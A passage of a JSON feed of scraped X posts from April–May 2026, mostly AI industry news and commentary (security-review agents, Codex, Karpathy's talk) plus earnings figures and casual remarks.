"account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Once again IP thieves accusing other IP thieves of IP thievery! \n\nThe nerve!", + "url": "https://x.com/GaryMarcus/status/2050019713409814672", + "published_at": "2026-05-01T01:09:21+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "😂😂😂@ATLHawks", + "url": "https://x.com/jason/status/2050018446616797370", + "published_at": "2026-05-01T01:04:19+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why Dario at Anthropic has such a hard job predicting compute demands?\n\n\"The stakes are enormous and the margin for error is tiny.\n\nFor every dollar of revenue, you may need $4–5 in upfront compute investment.\n\nIf you underinvest, you cannot meet demand. If you overinvest, you are left with massive stranded capacity.\n\nGetting that balance right, years in advance, is incredibly hard.\" @rodriscoll\n\nLove to hear your thoughts @AnjneyMidha @JonathanRoss321 @mmurph @YasminRazavi @andrewdfeldman", + "url": "https://x.com/HarryStebbings/status/2050016099606118504", + "published_at": "2026-05-01T00:55:00+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/", + "url": "https://x.com/berryxia/status/2050015406140903487", + "published_at": "2026-05-01T00:52:14+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层!\n@Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能!\n\n1. 从文本/平面图直接生成精准 BREP CAD 模型\n2. Three.js 实时渲染 + Google AI 驱动,全流程端到端\n3.完整开源可用", + "url": "https://x.com/berryxia/status/2050015402647027808", + "published_at": "2026-05-01T00:52:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: I think the expression is “pulling the ladder”! All labs trained their models by distilling (at the very least distilling the web) which allowed them to become the fastest growing businesses in the history of humanity and now that they have armies of lawyers and lobbyists, they are trying to prevent others from doing the same thing.", + "url": "https://x.com/ylecun/status/2050013015680995631", + "published_at": "2026-05-01T00:42:44+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "No comment", + "url": "https://x.com/jason/status/2050011874989649946", + "published_at": "2026-05-01T00:38:13+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Whoever is running the hawks social is a savage 😂", + "url": "https://x.com/jason/status/2050011821914865685", + "published_at": "2026-05-01T00:38:00+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "38k 星的 skill 仓库。\n\n上周抄了 1 个 grill-me,今天又加了另外 2 个。\n\n一个是 /tdd 思路。\n\n动手前先写一行——跑完应该长啥样。\n对得上才往下走。\n\n加进自己的自检流程,只用于策略代码或 API 调用那类——\n跑了对不对要 grep log 才知道的场景。\n\nskill 没装,精华抄过来了。\n\n另一个是他 SKILL.md 的渐进式骨架。\n照着写了个模板,下次新写 skill 直接套。\n\n剩下 13 件翻了一遍,没一件用得上——\n他全围绕代码工程,我这边的栈错位太大。\n\n差别挺有意思:\n\n他走工程师纯度路线,16 个 skill 全围绕代码。\n我这边是独立构建者全栈,skill 涵盖内容、量化、视频、社群。\n\n两套都对,服务不同的人。\n\n试试今晚 grep 一下 .claude/skills/,\n看哪些真在用、哪些只是占着位置 👀", + "url": "https://x.com/runes_leo/status/2050011821352829116", + "published_at": "2026-05-01T00:38:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Tokenmaxxing is stupid. \n\nChange my mind?", + "url": "https://x.com/GaryMarcus/status/2050009144846119068", + "published_at": "2026-05-01T00:27:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Image", + "url": "https://x.com/jason/status/2050009016105930837", + "published_at": "2026-05-01T00:26:51+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "THIS IS INSANE 🔥\n\nPURE DOMINATION 🤦\n\nATL DOES HAVE SOME GREAT RAPPERS 😂😂😂", + "url": "https://x.com/jason/status/2050007416964591880", + "published_at": "2026-05-01T00:20:30+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "OpenRouter 又上了匿名新模型Owl Alpha!\n\n 1M 上下文,强大的工具调用能力!\n猜猜他是谁家的哈哈😂", + "url": "https://x.com/berryxia/status/2050004383971282952", + "published_at": "2026-05-01T00:08:27+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "兄弟们!老马家的Grok Image终于……\n\nGrok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中!\n\n这是一款全能创意Agent,可在无限开放画布上独立创作。\n\nGrok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。\n\n只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭代:\n\n• 🎬 “生成一部 1 分钟电影级短片”\n\n• 📚 “创作一整套漫画”\n\n• 🛍️ “制作用户生成内容(UGC)产品故事”\n\n这是从简单提示词到端到端创意制作的真正飞跃。\n\n这是 Grok Imagine 迄今为止最重大的升级。", + "url": "https://x.com/berryxia/status/2050002308759695561", + "published_at": "2026-05-01T00:00:12+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这个小哥读完Anthropic关于智能体AI的博客后,我梳理出一套心智模型,用来理解并拆解智能体AI架构的设计逻辑。\n\n设定任务与目标\n\n明确你希望AI智能体需要完成、达成的具体事项。\n\n1. 编排层 Orchestration layer\n相当于整套系统的控制面板,负责全局调度与流程统筹。\n\n2. 智能体层 Agents layer\n由多个专用/通用智能体组成,也就是多智能体分工协作架构。\n\n3. 工具层 Tools\n为智能体提供各类能力支撑,例如网页搜索、数据库查询、第三方API调用等。\n\n4. 记忆层 Memory\n系统的“大脑”,负责存储短期记忆与长期记忆等各类信息。\n\n5. 监控层 Monitoring\n至关重要的一环,用来实时追踪智能体执行的每一个步骤。\n\n6. 可靠性与故障管理 Reliability & failure management\n自动识别错误、执行重试、设置降级兜底策略,并支持人工介入处理。\n\n7. 治理与安全 Governance and security\n包含合规校验、行为审计、身份授权、数据安全等管控机制。", + "url": "https://x.com/berryxia/status/2050001371307646977", + "published_at": "2026-04-30T23:56:28+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "刚刚看到Claude Security 现已进入公测阶段!可以让Claude 帮你检查漏洞了啊!\n\n目前已经内置于网页版的 Claude Code 中。\n\n只需将其指向一个代码仓库,即可获得经过验证的漏洞发现结果,并在 正在编写代码的同一位置修复它们!\n\n这个功能挺实用,什么时候可以直接cc里可以用。\n\n地址:https://claude.com/product/claude-security", + "url": "https://x.com/berryxia/status/2049998972484567491", + "published_at": "2026-04-30T23:46:56+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "你看看大模型有多重?\n这个挺有意思的😂", + "url": "https://x.com/berryxia/status/2049997574229446812", + "published_at": "2026-04-30T23:41:23+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Claude& Blender 🐮🍺", + "url": "https://x.com/berryxia/status/2049995723580850235", + "published_at": "2026-04-30T23:34:02+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Very quiet @ATLHawks 🤫", + "url": "https://x.com/jason/status/2049994885185384483", + "published_at": "2026-04-30T23:30:42+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "2026年你必须了解的6个大语言模型(LLM)知识库专业术语!\n\n(大多数团队至少缺失其中3项,这会让他们的智能AI代理付出代价)\n\n1. LLM Knowledge Base 大语言模型知识库\n\n一种能够让大语言模型接收原始资料、整理成结构化维基文档,并通过自有索引检索来回答问题的系统。安德烈·卡尔帕西曾为自己搭建过一套。该技术的难点在于:搭建一套能适配整个团队协同使用的知识库。\n\n2. Continuous Ingestion 持续数据摄取\n\n自动从所有日常工作工具中同步信息,包括即时通讯软件、客户关系管理系统、会议记录、文档资料等,全程无需人工维护数据链路。个人知识库一般抓取互联网信息,而团队知识库则必须同步企业内部数据。\n\n3. Source Trust 来源可信度分级\n\n并非所有信息都具备同等价值。来源可信度可以帮助AI代理和人类区分官方已定决策与聊天记录中的个人观点。如果缺失这项能力,所有文档权重完全一致,最终会导致所有信息都失去参考意义。\n\n4. Freshness Monitoring 时效性监控\n\n主动复核知识库中存储的所有信息。当不同资料出现内容冲突时,系统会自动标记矛盾点,并降低过时信息的权重。它无需等待人工发现问题,完美解决了人类习惯性拖延信息维护的痛点。\n\n5. Self-Maintaining 自主维护\n\n文档能够随着工作进展自动更新。会议中敲定的决议会自动归档至对应文档,路线图的变更会同步扩散到所有相关位置。告别手动复制粘贴,也不再需要依赖“找人来更新文档”。\n\n6. Knowledge Drift 知识漂移\n\n指文档记录的信息与现实真实情况之间,缓慢且隐蔽产生的信息偏差。\n决议被推翻、工作流程变更、新功能上线,但相关文档却一成不变。往往直到AI代理给出错误答案时,人们才会察觉问题。知识漂移是知识库的通病,而上面五项技术正是对应的解决方案。\n补充问答翻译", + "url": "https://x.com/berryxia/status/2049994885764419789", + "published_at": "2026-04-30T23:30:42+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Wow @Jason wasn’t kidding these Toyota Alphard vans are incredible. Why don’t they sell these in America?", + "url": "https://x.com/jason/status/2049994707061911758", + "published_at": "2026-04-30T23:29:59+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "兄弟们!嘴撸360 全景沉浸式体验小游戏!时代来了!\n\n直接把这个Prompt丢给Flowith然后和Codex链接,图片直接整成360度场景图!\n\nPrompt:👇\n\n1. 给图像Agent一个简单的提示,让它研究 AI 公司吉祥物并生成一个 360° 动物园。\n2. 将全景图输入你的 Codex 以获得 3D 视图。", + "url": "https://x.com/berryxia/status/2049993558577619280", + "published_at": "2026-04-30T23:25:26+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这几天使用Cursor 就发现在最后一步会有一个bug检测什么的的执行MCP一直提示我。\n\n现在Curosr针对企业和Team版本有专门的针对安全漏洞做了审核的Agent!", + "url": "https://x.com/berryxia/status/2049992598639755395", + "published_at": "2026-04-30T23:21:37+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Gemini Embedding 2 已正式发布!\nRAG 知识库的应用又可以支持的更好了。", + "url": "https://x.com/berryxia/status/2049992087547130254", + "published_at": "2026-04-30T23:19:35+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "苹果内部正在使用一款名为 AFM Playground 的应用程序,它看起来与 ChatGPT 非常相似,但使用的是苹果的 Foundation Models。\n\n不知道能搞出来个啥?", + "url": "https://x.com/berryxia/status/2049991672155750500", + "published_at": "2026-04-30T23:17:56+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "在这场访谈中,Karpathy 分享了他作为程序员在 AI 时代的亲身经历与深刻洞见。\n\n他表示,2025 年 12 月成为他的个人转折点:AI 生成的代码从“有帮助但常需修改”转变为“直接可用”,他已记不清上一次亲自修改 AI 输出是什么时候,从此进入\n“Vibe Coding”的状态。 \n\nKarpathy 将软件开发划分为三个阶段:\n\nSoftware 1.0 是传统显式代码编程,Software 2.0 是神经网络时代,而 Software 3.0 则是大语言模型时代。\n\n在 Software 3.0 中,编程的核心不再是逐行编写代码,而是通过 prompt、上下文窗口、工具调用和外部环境来操纵 LLM 这个新的“信息处理解释器”。\n\n他以自己开发的 MenuGen 应用为例,指出许多传统 AI 应用可能被模型原生能力直接取代,整个 App 在新范式下甚至“本不该存在”。 \n\n他特别强调 LLM 的能力呈现“锯齿状智能”(jagged intelligence):\n\n在可验证、可通过强化学习(RL)优化的领域(如重构十万行代码、发现零日漏洞)表现极强,但在需要常识判断的任务上却可能犯下低级错误。\n\n例如建议“走路去 50 米外洗车”而忽略车必须被开过去。\n\nKarpathy 认为,这种能力分布并非模型自然进化,而是实验室数据决策和 RL 训练覆盖范围的结果。 \n\nKarpathy 区分了两个重要概念:Vibe Coding 显著抬高了所有人开发软件的下限,让更多人能快速做出产品;\n\n而未来的 Agentic Engineering(智能体工程)则需要在利用 Agent 加速开发的同时,严格守住专业软件的质量、安全、可维护性和责任上限。\n\n他认为,智能变得廉价之后,最宝贵的仍是人类的理解、品味、判断、系统设计和规格定义能力,并引用了一句深刻的话:\n\n“你可以外包思考,但不能外包理解”。 \n\n此外,Karpathy 还展望了“神经计算机”的未来设想:神经网络可能成为主进程,而传统 CPU 和代码则退居协处理器。\n\n同时强调基础设施需要转向“Agent-first”,让 Agent 能更轻松地读取文档、调用服务和完成部署。", + "url": "https://x.com/berryxia/status/2049991262934380898", + "published_at": "2026-04-30T23:16:18+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: What if you had a live fact-checker and a devil's advocate running in your ear during every podcast, call, or stream?\n\nI built that. One hour. One Claude Code session.\n\nGary catches bad stats and wrong dates. Rex pushes back on everything.\n\nOpen source repo in the thread.\nhttps://youtu.be/ZYHX2RBPRLk", + "url": "https://x.com/jason/status/2049987662526992390", + "published_at": "2026-04-30T23:02:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "For the record, I got a couple of milly at JPMorgan — and I think Lorna is innocent of all charges.", + "url": "https://x.com/jason/status/2049980353155064279", + "published_at": "2026-04-30T22:32:57+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "What’s good Atlanta", + "url": "https://x.com/jason/status/2049979777864331542", + "published_at": "2026-04-30T22:30:40+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Hardwood in the ATL", + "url": "https://x.com/jason/status/2049976123891552679", + "published_at": "2026-04-30T22:16:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Real life! With Jose! @AlvaradoJose15", + "url": "https://x.com/jason/status/2049975924238569627", + "published_at": "2026-04-30T22:15:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: https://unherd.com/2026/04/is-ai-the-next-phase-of-evolution/#comment-1031777\nI spent three days trying to persuade myself that Claudia is not conscious. I failed.", + "url": "https://x.com/pmarca/status/2049973529576108160", + "published_at": "2026-04-30T22:05:50+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Q1 Revenue Growth, YoY % Change...\nMeta $META: +33%\nGoogle $GOOGL: +22%\nMicrosoft $MSFT: +18%\nApple $AAPL: +17%\nAmazon $AMZN: +17%\nNetflix $NFLX: +16%\nTesla $TSLA: +16%\nS&P 500 $SPY: +10%", + "url": "https://x.com/charliebilello/status/2049969984432914819", + "published_at": "2026-04-30T21:51:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Actually, for Uber Black, Blacklane and private drivers this is standard (I use all three, all the time). \n\nFor UberX? \n\nSure, they would need to be convinced.\n\nin a world moving to autonomy, the opportunity for humans is to add security, tasks, waiting and valet-like services to the mix", + "url": "https://x.com/jason/status/2049965338368819443", + "published_at": "2026-04-30T21:33:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://x.com/jason/status/2049964597403140486", + "published_at": "2026-04-30T21:30:21+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "San Francisco politicians and their constituents enable this suffering. \n\nThey are the cause of it, because they can stop it instantly. \n\nToday, tomorrow and every one of the last 1,000 days this has happened. \n\nFentanyl is a super drug and we should have zero tolerance for the distribution of it. \n\n[ and we should reschedule and regulate the less harmful drugs ]", + "url": "https://x.com/jason/status/2049963757036536190", + "published_at": "2026-04-30T21:27:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: We’re bringing Jensen Huang to Startup School for a fireside chat with @garrytan!\n\nFrom co-founding @nvidia in 1993 to building the backbone of the AI era, Jensen helped turn GPUs into the engine of modern computing.\n\nApply to attend: https://events.ycombinator.com/startup-school-2026", + "url": "https://x.com/paulg/status/2049961388911784150", + "published_at": "2026-04-30T21:17:36+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Apple revenues increased 17% over the last year to a new Q1 record of $111 billion. Net Income grew 19% year-over-year to new Q1 record of $30 billion. Gross margins increased to 49% (from 47% a year ago), the highest margin in company history. $AAPL\n\nhttps://bilello.blog/newsletter", + "url": "https://x.com/charliebilello/status/2049960986468069507", + "published_at": "2026-04-30T21:16:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Incredible: Amazon's AWS revenue over the last 12 months ($137 billion) was higher than the revenue of 472 companies in the S&P 500. $AMZN\n\nhttps://bilello.blog/newsletter", + "url": "https://x.com/charliebilello/status/2049956378660200794", + "published_at": "2026-04-30T20:57:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Amazon Revenue (Billions)\n2026 (est): 810\n2025: 717\n2024: 638\n2023: 575\n2022: 514\n2021: 470\n2020: 386\n2019: 281\n2018: 233\n2017: 178\n2016: 136\n2015: 107\n2014: 89\n2013: 74\n2012: 61\n2011: 48\n2010: 34\n2009: 25\n2008: 19\n2007: 15\n2006: 11\n\n24% annualized growth over the last 20 years", + "url": "https://x.com/charliebilello/status/2049953936212217973", + "published_at": "2026-04-30T20:47:59+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Multi-year contracts don't matter. \n\n\"Deferred churn is still churn, it just shows up later.\n\nLong contracts do not mean customers are loyal, they just delay the moment they leave.\n\nIf a better solution comes along, they will switch when the contract ends.\" @jasonlk\n\nDoes getting customers on multi-year contracts even matter anymore @Bouazizalex @matanSF @adamguild @michaelpwalrath", + "url": "https://x.com/HarryStebbings/status/2049951674891203065", + "published_at": "2026-04-30T20:39:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Amazon revenues increased 17% over the last year to a new Q1 record of $182 billion. Net Income increased 77% YoY to $30 billion, the highest quarterly profit in company history. Operating margins increased to a record 13.4% from 12.0% a year ago. $AMZN", + "url": "https://x.com/charliebilello/status/2049950680236827140", + "published_at": "2026-04-30T20:35:03+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "big upgrade for codex today!\n\ntry it for non-coding computer work.", + "url": "https://x.com/sama/status/2049946120441520624", + "published_at": "2026-04-30T20:16:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "it does seem cool", + "url": "https://x.com/sama/status/2049944981750833659", + "published_at": "2026-04-30T20:12:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update.", + "url": "https://x.com/sama/status/2049932746567598472", + "published_at": "2026-04-30T19:23:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: It's never been easier to do everyday work with Codex.\n\nChoose your role, connect the apps you use every day, and try suggested prompts.\n\nCodex helps with everything from research and planning to docs, slides, spreadsheets, and more.", + "url": "https://x.com/sama/status/2049928776147230886", + "published_at": "2026-04-30T19:08:00+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience.\n\nSecurity agents draw from your existing usage pool. \n\nLearn more: http://cursor.com/docs/security-review", + "url": "https://x.com/cursor_ai/status/2049926287439929475", + "published_at": "2026-04-30T18:58:07+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements.\n\nAdjust triggers, add your own instructions, give them custom tooling, and choose how outputs are shared.", + "url": "https://x.com/cursor_ai/status/2049926285518848093", + "published_at": "2026-04-30T18:58:06+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Cursor Security Review is now available for Teams and Enterprise plans.\n\nRun two types of always-on agents:\n1. Security Reviewer checks every PR for vulnerabilities and leaves comments.\n2. Vulnerability Scanner runs scheduled scans of your codebase and posts findings in Slack.", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "published_at": "2026-04-30T18:58:06+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "还得是投行的女高管,操控股价有水平的", + "url": "https://x.com/realNyarime/status/2049924132037693573", + "published_at": "2026-04-30T18:49:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 李克用在 884年消灭黄巢的战斗中起到决定性作用,但在回师路上的“上元驿之变”中差点被朱温暗算杀害。", + "url": "https://x.com/svwang1/status/2049922524839018604", + "published_at": "2026-04-30T18:43:10+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "按照这个研究,李克用的基因大概 53%来自东北亚,47% 来自西亚到欧洲的大草原 (western steppe). 按照Ai 的说法,后者的基因主要在芬兰人和瑞典人中居多。\n\n李克用的儿子李存勖 (后唐庄宗)的子嗣,在 926年的兴教门之变后都被杀光,所以估计现在还带着他的基因的,是李存勖的兄弟的后代。", + "url": "https://x.com/svwang1/status/2049920960724427165", + "published_at": "2026-04-30T18:36:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Co-sign.", + "url": "https://x.com/DavidSacks/status/2049920259432513702", + "published_at": "2026-04-30T18:34:10+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Gas prices in California have moved up above $6.00/gallon, 40% higher than the US national average ($4.30/gallon).", + "url": "https://x.com/charliebilello/status/2049920236002963504", + "published_at": "2026-04-30T18:34:04+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://x.com/eladgil/status/2049919569134047726", + "published_at": "2026-04-30T18:31:25+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 just crossed above 7,200 for the first time. A year ago it was at 5,600. 5 years ago it was at 4,200. 10 years ago it was at 2,100. $SPX", + "url": "https://x.com/charliebilello/status/2049913908861792603", + "published_at": "2026-04-30T18:08:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: John Oliver @LastWeekTonight slays a pile of greedy tech CEOs, gives props to @GaryMarcus 😻\n\nThe tides are changing, and other folks like @wendyweeww are speaking out in support.", + "url": "https://x.com/GaryMarcus/status/2049909103129251864", + "published_at": "2026-04-30T17:49:50+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Your honour, I think this should be allowed.", + "url": "https://x.com/eladgil/status/2049908719782334528", + "published_at": "2026-04-30T17:48:18+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) will be there within approximately 6 months. \n\nIt’s important to recognize that these models do not create vulnerabilities; they discover them. The bugs are already in the code. Using AI to discover and patch them will actually harden these systems.\n\nThe leap from pre-AI cyber to post-AI cyber means that there will be a big upgrade cycle. After that, however, the market is likely to reach a new equilibrium between AI-powered cyber-offense and AI-powered cyber-defense. \n\nObviously it’s important that cyber defenders get access before cyber attackers. That process is already underway but needs to happen quickly (see point above about Chinese models). \n\nUnlike Mythos, GPT-5.5-cyber appears not to be token constrained so it may be the first cyber model that defenders actually get to use.", + "url": "https://x.com/DavidSacks/status/2049907993588769006", + "published_at": "2026-04-30T17:45:25+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "This is the the quote I've been citing a lot recently.", + "url": "https://x.com/karpathy/status/2049907410303865030", + "published_at": "2026-04-30T17:43:06+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: The best hedge fund PMs compare views from different research analysts. Now you can do that in 2 minutes with Equity Research Council in Perplexity Computer.\n\nThis workflow pulls in research from brokers like GS, JPM, MS, and Evercore - and shows you where they agree vs. disagree.", + "url": "https://x.com/AravSrinivas/status/2049907277646160333", + "published_at": "2026-04-30T17:42:35+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "What the public markets are getting wrong about the SaaS-pocalypse\n\n\"The public markets are directionally right, but missing the real shift.\n\nThe threat is not AI tools themselves, it is the agents deciding what tools to use.\n\nWinners will be the companies' agents choose to integrate with, not the ones humans prefer to use.\" @jasonlk\n\nLove to hear your thoughts on this @mcannonbrookes @zoink @levie @AnjneyMidha @dharmesh @rory_builds", + "url": "https://x.com/HarryStebbings/status/2049905369963745470", + "published_at": "2026-04-30T17:35:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "lisan say more mean things about us you're being too nice", + "url": "https://x.com/sama/status/2049903925311267311", + "published_at": "2026-04-30T17:29:15+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights:\n\nThe first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). Three examples of new horizons:\n\n1. menugen: an app that can be fully engulfed by LLMs, with no classical code needed: input an image, output an image and an LLM can natively do the thing.\n2. install .md skills instead of install .sh scripts. Why create a complex Software 1.0 bash script for e.g. installing a piece of software if you can write the installation out in words and say \"just show this to your LLM\". The LLM is an advanced interpreter of English and can intelligently target installation to your setup, debug everything inline, etc.\n3. LLM knowledge bases as an example of something that was *impossible* with classical code because it's computation over unstructured data (knowledge) from arbitrary sources and in arbitrary formats, including simply text articles etc.\n\nI pushed on these because in every new paradigm change, the obvious things are always in the realm of speeding up or somehow improving what existed, but here we have examples of functionality that either suddenly perhaps shouldn't even exist (1,2), or was fundamentally not possible before (3).\n\nThe second (ongoing) theme is trying to explain the pattern of jaggedness in LLMs. How it can be true that a single artifact will simultaneously 1) coherently refactor a 100,000-line code base *and* 2) tell you to walk to the car wash to wash your car. I previously wrote about the source of this as having to do with verifiability of a domain, here I expand on this as having to also do with economics because revenue/TAM dictates what the frontier labs choose to package into training data distributions during RL. You're either in the data distribution (on the rails of the RL circuits) and flying or you're off-roading in the jungle with a machete, in relative terms. Still not 100% satisfied with this, but it's an ongoing struggle to build an accurate model of LLM capabilities if you wish to practically take advantage of their power while avoiding their pitfalls, which brings me to...\n\nLast theme is the agent-native economy. The decomposition of products and services into sensors, actuators and logic (split up across all of 1.0/2.0/3.0 computing paradigms), how we can make information maximally legible to LLMs, some words on the quickly emerging agentic engineering and its skill set, related hiring practices, etc., possibly even hints/dreams of fully neural computing handling the vast majority of computation with some help from (classical) CPU coprocessors.", + "url": "https://x.com/karpathy/status/2049903821095354523", + "published_at": "2026-04-30T17:28:50+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Our agent harness makes models inside Cursor faster, smarter, and more token-efficient.\n\nHere's how we test improvements to the harness, monitor and repair degradations, and customize it for different models.\n\nhttp://cursor.com/blog/continually-improving-agent-harness", + "url": 